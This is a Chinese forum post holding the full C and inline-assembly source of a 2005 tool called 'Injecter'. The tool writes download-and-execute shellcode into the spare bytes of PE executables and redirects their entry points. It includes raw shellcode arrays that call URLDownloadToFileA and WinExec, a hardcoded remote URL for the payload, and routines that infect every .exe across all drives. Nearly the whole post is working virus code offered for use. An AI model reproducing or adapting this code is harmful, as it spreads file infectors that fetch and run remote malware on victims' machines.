HanDs
管理员

[Visual Studio文章] pe代码注射 



/*
思路:把一个download && execute shellcode改装注射到pe文件的空闲字节处
enjoy it!
*/

#include
#include

//#define        CODESIZE    439

typedef    struct    _DISKLIST        //用于保存磁盘驱动器信息的链表
{
    _DISKLIST    *next;
    char        RootPath[6];
}DISKLIST,*PDISKLIST;

unsigned char    *injectcode;
DWORD            CodeSize;

unsigned char code_dll_header[]=
"\xE9\xF4\x00\x00\x00\x5A\xB8\x0C\xF0\xFD\x7F\x8B\x00\x8B\x70\x1C"
"\xAD\x8B\x40\x08\x8B\xD8\x8B\x73\x3C\x03\xF3\x8B\x76\x78\x03\xF3"
"\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03"
"\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45"
"\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1"
"\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC1\x8B"
"\x00\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x06\x59\xE8"
"\x70\x00\x00\x00\x83\xC6\x0D\x52\x56\xFF\x57\xFC\x5A\x8B\xD8\x6A"
"\x01\x59\xE8\x5D\x00\x00\x00\x83\xC6\x13\x56\x46\x80\x3E\x80\x75"
"\xFA\x80\x36\x80\x5E\x83\xEC\x20\x8B\xDC\x6A\x20\x53\xFF\x57\xE4"
"\xC7\x04\x18\x5C\x72\x74\x2E\xC7\x44\x18\x04\x64\x6C\x6C\x00\x90"
"\x81\xEC\x40\x01\x00\x00\x54\x53\xFF\x57\xF0\x83\xF8\x00\x7E\x08"
"\x53\xFF\x57\xEC\x85\xC0\x74\x16\x33\xC0\x50\x50\x53\x56\x50\xFF"
"\x57\xFC\x85\xC0\x75\x08\x50\x83\xC6\x2B\x56\xFF\x57\xE8\xE9\xA2"
"\xA2\xA2\xA2\x90\x33\xC0\xAC\x85\xC0\x75\xF9\x51\x52\x56\x53\xFF"
"\xD2\x5A\x59\xAB\xE2\xEE\x33\xC0\xC3\xE8\x07\xFF\xFF\xFF\x47\x65"
"\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74"
"\x53\x79\x73\x74\x65\x6D\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x41"
"\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x44\x65\x6C\x65\x74\x65\x46"
"\x69\x6C\x65\x41\x00\x46\x69\x6E\x64\x46\x69\x72\x73\x74\x46\x69"
"\x6C\x65\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6C"
"\x6D\x6F\x6E\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54"
"\x6F\x46\x69\x6C\x65\x41\x00";


unsigned char code_exe_header[]=
"\xE9\xF4\x00\x00\x00\x5A\xB8\x0C\xF0\xFD\x7F\x8B\x00\x8B\x70\x1C"
"\xAD\x8B\x40\x08\x8B\xD8\x8B\x73\x3C\x03\xF3\x8B\x76\x78\x03\xF3"
"\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03"
"\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45"
"\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1"
"\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC1\x8B"
"\x00\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x06\x59\xE8"
"\x70\x00\x00\x00\x83\xC6\x0D\x52\x56\xFF\x57\xFC\x5A\x8B\xD8\x6A"
"\x01\x59\xE8\x5D\x00\x00\x00\x83\xC6\x13\x56\x46\x80\x3E\x80\x75"
"\xFA\x80\x36\x80\x5E\x83\xEC\x20\x8B\xDC\x6A\x20\x53\xFF\x57\xE4"
"\xC7\x04\x18\x5C\x72\x74\x2E\xC7\x44\x18\x04\x65\x78\x65\x00\x90"
"\x81\xEC\x40\x01\x00\x00\x54\x53\xFF\x57\xF0\x83\xF8\x00\x7E\x08"
"\x53\xFF\x57\xEC\x85\xC0\x74\x16\x33\xC0\x50\x50\x53\x56\x50\xFF"
"\x57\xFC\x85\xC0\x75\x08\x50\x53\x90\x90\x90\xFF\x57\xE8\xE9\xA2"
"\xA2\xA2\xA2\x90\x33\xC0\xAC\x85\xC0\x75\xF9\x51\x52\x56\x53\xFF"
"\xD2\x5A\x59\xAB\xE2\xEE\x33\xC0\xC3\xE8\x07\xFF\xFF\xFF\x47\x65"
"\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74"
"\x53\x79\x73\x74\x65\x6D\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x41"
"\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x44\x65\x6C\x65\x74\x65\x46"
"\x69\x6C\x65\x41\x00\x46\x69\x6E\x64\x46\x69\x72\x73\x74\x46\x69"
"\x6C\x65\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6C"
"\x6D\x6F\x6E\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54"
"\x6F\x46\x69\x6C\x65\x41\x00";

WIN32_FIND_DATA        fd;
int                    ret;
DWORD                dd;
PDISKLIST            d_hlist=NULL,d_plist=NULL,d_padd=NULL;
char                szWinDir[MAX_PATH]={0};

int    WINAPI    InjectCode(char *lpFileName)
{
    HANDLE    hFile,hMap;
    DWORD    dwSize=0,dwSizeHigh=0,dwAddr;
    char    buff[100]={0};
    DWORD    dd;
    DWORD    dwPeHdr,dwSecAddr,dwOldEntryPointer,dwNewEntryPointer;

   

    hFile=CreateFile(lpFileName,
                    GENERIC_READ + GENERIC_WRITE,
                    FILE_SHARE_READ + FILE_SHARE_WRITE,
                    0,
                    OPEN_EXISTING,
                    0,
                    0);
    if (hFile<=0)
    {
        return -1;
    }

    dwSize=GetFileSize(hFile,&dwSizeHigh);
    if ((dwSize<=0)||(dwSizeHigh>0))
    {
        CloseHandle(hFile);
        return -1;
    }
   

    //printf("size=%d\n",dwSize);


    hMap=CreateFileMapping((HANDLE)hFile,
                           NULL,
                           PAGE_READWRITE,
                           0,
                           0,
                           NULL);
    if (hMap<=0)
    {
        CloseHandle(hFile);
        return -1;
    }
   
    dwAddr=(DWORD)MapViewOfFile(hMap,
                                FILE_MAP_WRITE,
                                0,
                                0,
                                0);
try
{
    _asm
    {
        mov        esi,dwAddr
        cmp        WORD ptr [esi],'ZM'
        jne        _injectnot
        add        esi,DWORD ptr [esi+3ch]        ;指向PE_HEADER
        cmp        WORD ptr [esi],'EP'
        jne        _injectnot
        mov        dwPeHdr,esi
        mov        eax,[esi+28h]
        mov        dwOldEntryPointer,eax       
        cmp        dword ptr [esi+8],'rude'    ;判断感染标志
        je        _isinjected
        mov        ecx,DWORD ptr [esi+74h]        ;得到directory的数目 NumberOfRvaAndSizes
        imul    ecx,ecx,8
        lea        eax,[ecx+esi+78h]    ;data directory  eax->节表起始地址

        movzx    ecx,word  ptr [esi+6h]    ;ecx->节数目        
        mov        edi,eax
        xor        edx,edx
        dec        edx


_loop1:
        inc        edx
        imul    eax,edx,28h
        mov        ebx,dword ptr [edi+eax+10h]        ;SizeOfRawData 28h->节表大小
        sub        ebx,[edi+eax+8h]                ;SizeOfRawData-VirtualSize 剩余空间
        cmp        ebx,CodeSize
        jg        _writecode            ;写入代码

        mov        dd,ebx
        push    ecx
        push    edx

    }

    //printf("%d\n",dd);
    _asm
    {
        pop        edx
        pop        ecx
        loop    _loop1

        jmp        _injectnot

_writecode:
        add        edi,eax
        mov        dwSecAddr,edi

        mov        ebx,[edi+0ch]        ;VirtualAddress
        add        ebx,[edi+8h]        ;ebx->代码在内存中地址

        mov        dwNewEntryPointer,ebx

        add        ebx,0deh            ;ebx->jmp EntryPoint指令地址
        sub        ebx,dwOldEntryPointer
        mov        eax,0FFFFFFFFh       
        sub        eax,ebx
        sub        eax,4
        mov        esi,injectcode        ;更新跳转指令码
        add        esi,0dfh
        mov        dword ptr [esi],eax

        mov        ebx,[edi+14h]        ;PointerToRawData
        add        ebx,[edi+8h]        ;ebx->代码写入地址
        add        ebx,dwAddr
        mov        edi,ebx
        mov        ecx,CodeSize
        mov        esi,injectcode
        rep        movsb                    ;写入代码

        mov        edi,dwSecAddr
        mov        dword ptr [edi+24h],0E0000020h    ;节属性
       
        mov        esi,dwPeHdr
        mov        dword ptr [esi+8h],'rude'        ;写入感染标志

        mov        eax,dwNewEntryPointer
        mov        dword ptr [esi+28h],eax        ;更新EntryPoint

    }

    UnmapViewOfFile((LPCVOID)dwAddr);
    CloseHandle(hMap);
    CloseHandle(hFile);
    return 0;

    _asm
    {
_injectnot:
_exit:
       
    }

    UnmapViewOfFile((LPCVOID)dwAddr);
    CloseHandle(hMap);
    CloseHandle(hFile);

    return -1;

_asm
{
_isinjected:
}

    UnmapViewOfFile((LPCVOID)dwAddr);
    CloseHandle(hMap);
    CloseHandle(hFile);

    return -2;
}                        //异常捕获
catch (...)
{
    printf("error!\n");
}

}


int    WINAPI ckDirS(char *szDir)
{
    HANDLE                hSearch;
    char                szDirectory[MAX_PATH];
    char                szDirTmp[MAX_PATH];

   
    dd=strlen(szWinDir);
    if (memcmp(strupr(szDir),strupr(szWinDir),dd)==0)        //跳过windows目录
    {
        return 0;
    }

    memset(&fd,0,sizeof(WIN32_FIND_DATA));

    strncpy(szDirectory,szDir,MAX_PATH);
    strcat(szDirectory,"*.*");
    hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);

    if (hSearch==INVALID_HANDLE_VALUE)
    {
        return    -1;
    }

    do
    {
        if (fd.cFileName[0]!='.')
        {
       
            if(fd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY)    //目录
            {
                memset(szDirTmp,0,MAX_PATH);
                strcat(szDirTmp,szDir);
                strcat(szDirTmp,fd.cFileName);               
                strcat(szDirTmp,"\\");
                ckDirS(szDirTmp);
            }
            else
            {
                dd=strlen(fd.cFileName);
                if ((fd.cFileName[dd-4]=='.')&&
                    (fd.cFileName[dd-3]=='e')&&
                    (fd.cFileName[dd-2]=='x')&&
                    (fd.cFileName[dd-1]=='e'))
                {
                    memset(szDirTmp,0,MAX_PATH);
                    strcat(szDirTmp,szDir);
                    strcat(szDirTmp,fd.cFileName);               
                   
                    printf("inject:%s...",szDirTmp);
                    ret=InjectCode(szDirTmp);

                    if (ret==0)
                    {
                        printf("ok!\n");
                    }
                    else if  (ret==-1)
                    {
                        printf("faild!\n");
                    }
                    else if (ret==-2)
                    {
                        printf("injected!\n");
                    }
                }
            }
        }
    }
    while (FindNextFile(hSearch,&fd));

    return 0;
}

int    WINAPI ckDir(char *szDir)
{
    HANDLE                hSearch;
    char                szDirectory[MAX_PATH];
    char                szDirTmp[MAX_PATH];

    memset(&fd,0,sizeof(WIN32_FIND_DATA));

    strncpy(szDirectory,szDir,MAX_PATH);
    strcat(szDirectory,"*.exe");
    hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);

    if (hSearch==INVALID_HANDLE_VALUE)
    {
        return    -1;
    }

    do
    {
        if (fd.cFileName[0]!='.')
        {

            memset(szDirTmp,0,MAX_PATH);
            strcat(szDirTmp,szDir);
            strcat(szDirTmp,fd.cFileName);               
                   
            printf("inject:%s...",szDirTmp);
            ret=InjectCode(szDirTmp);

            if (ret==0)
            {
                printf("ok!\n");
            }
            else if  (ret==-1)
            {
                printf("faild!\n");
            }
            else if (ret==-2)
            {
                printf("injected!\n");
            }
        }
    }
    while (FindNextFile(hSearch,&fd));

    return 0;
}

void start(void)
{
    printf("\n");
    printf("Injecter  //--A Tool Can Inject The Download&&Execute Trojan To The PE File\n");
    printf("Written By Ruder [2005/3],E-mail:[email protected]\n");
    printf("Homepage:http://ruder.cdut.net,enjoy it!\n");
    printf("Usage:\n");
    printf("\tInjecter [order] [param]\n");
    printf("\t[order]:\n");
    printf("-all ---Inject all the exe file on disk except windows directory\n");
    printf("-s   ---under the directory,will scan the sub directory\n");
    printf("-d   ---under the directory,will not scan the sub directory\n");
    printf("example:\n");
    printf("\tInjecter -all\n");
    printf("\tInjecter -s e:\\\n");
    printf("\tInjecter -d d:\\\n");
    printf("\n");
}

int    WINAPI    BrowDisk_SaveDiskInfoToList(char *lpChar)
{
    //解码,添加磁盘名到链表
    d_padd=(PDISKLIST)malloc(sizeof(_DISKLIST));
    if (d_padd==NULL)
    {
        return -1;
    }

    memset(d_padd->RootPath,0,6);
    strncpy(d_padd->RootPath,lpChar,strlen(lpChar));

    d_padd->next=NULL;

    if (d_hlist==NULL)        //首链为空
    {
        d_hlist=d_padd;
        d_plist=d_hlist;
    }
    else                    //添加至链表
    {
        d_plist->next=d_padd;
        d_plist=d_padd;
    }   
   
    return 0;
}

BOOL WINAPI BrowDisk_GetLogicalDriveList(VOID)
{
    char            BDBuffer[128];
    char            *lpChar;
   
    memset(BDBuffer, 0x00, 128);

    if (GetLogicalDriveStrings(128, BDBuffer) == 0 )
    {
        return FALSE;
    }

    for (lpChar=BDBuffer;*lpChar!=0x00;lpChar=lpChar+strlen(lpChar)+1)
    {
        BrowDisk_SaveDiskInfoToList(lpChar);
    }
}

int WINAPI InjectAll(void)
{
    PDISKLIST    p1;

    BrowDisk_GetLogicalDriveList();
    p1=d_hlist;
    if (p1==NULL)
    {
        return -1;
    }

    while (1)
    {
        ckDirS(p1->RootPath);

        p1=p1->next;
        if (p1==NULL)
        {
            break;
        }
    }

    return 0;
}

int MakeInjectCode_Dll(char *szGetStr,char *szRunStr)
{
    DWORD        dd1,dd2,i;

    dd1=strlen(szGetStr)+1;
    dd2=strlen(szRunStr)+1;

    CodeSize=sizeof(code_dll_header)+dd1+dd2-1;

    injectcode=(unsigned char *)malloc(CodeSize);
    if (injectcode==NULL)
    {
        return -1;
    }

    printf("%.8x\n",(DWORD)injectcode);

    *(char *)(code_dll_header+0xD9)=(char)dd1;
    i=sizeof(code_dll_header);
    memcpy(injectcode,code_dll_header,i);
    memcpy(injectcode+i-1,szGetStr,dd1);
    i=i+dd1-1;
    *(char *)(injectcode+i-1)=0x80;
    memcpy(injectcode+i,szRunStr,dd2);

   

    printf("%.8x\n",(DWORD)injectcode);

    return 0;
}

int MakeInjectCode_Exe(char *szGetStr)
{
    DWORD        dd1,i;

    dd1=strlen(szGetStr)+1;

    CodeSize=sizeof(code_exe_header)+dd1-1;

    injectcode=(unsigned char *)malloc(CodeSize);
    if (injectcode==NULL)
    {
        return -1;
    }


    i=sizeof(code_exe_header);
    memcpy(injectcode,code_exe_header,i);
    memcpy(injectcode+i-1,szGetStr,dd1);
    i=i+dd1-1;
    *(char *)(injectcode+i-1)=0x80;

    return 0;
}

void main(int argc,char *argv[])
{
    int        orderid;

//    InjectCode("C:\\NTFSDOS\\ntfschk.exe");

//    return;

    MakeInjectCode_Exe("http://www.xloading.com/ruder/calc.exe");

    printf("SizeCode=%d\n",CodeSize);
    printf("%d\n",InjectCode("d:\\a\\pslist.exe"));

    /*
    if ((argc!=2)&&(argc!=3))
    {
        start();
        return;
    }
       
    GetWindowsDirectory(szWinDir,MAX_PATH);
    strcat(szWinDir,"\\");

    if (strcmp(argv[1],"-all")==0)
    {
        orderid=0;
        InjectAll();
        return;
    }

    if (strcmp(argv[1],"-s")==0)
    {
        orderid=1;

        if (argc==2)
        {
            start();
            return;
        }
        if (argv[2][strlen(argv[2])-1]!='\\')
        {
            start();
            return;
        }
        ckDirS(argv[2]);
        return;
    }

    if (strcmp(argv[1],"-d")==0)
    {
        orderid=2;
        if (argc==2)
        {
            start();
            return;
        }
        if (argv[2][strlen(argv[2])-1]!='\\')
        {
            start();
            return;
        }
        ckDir(argv[2]);
        return;
    }

    start();
    */
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
pe 代码注射
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复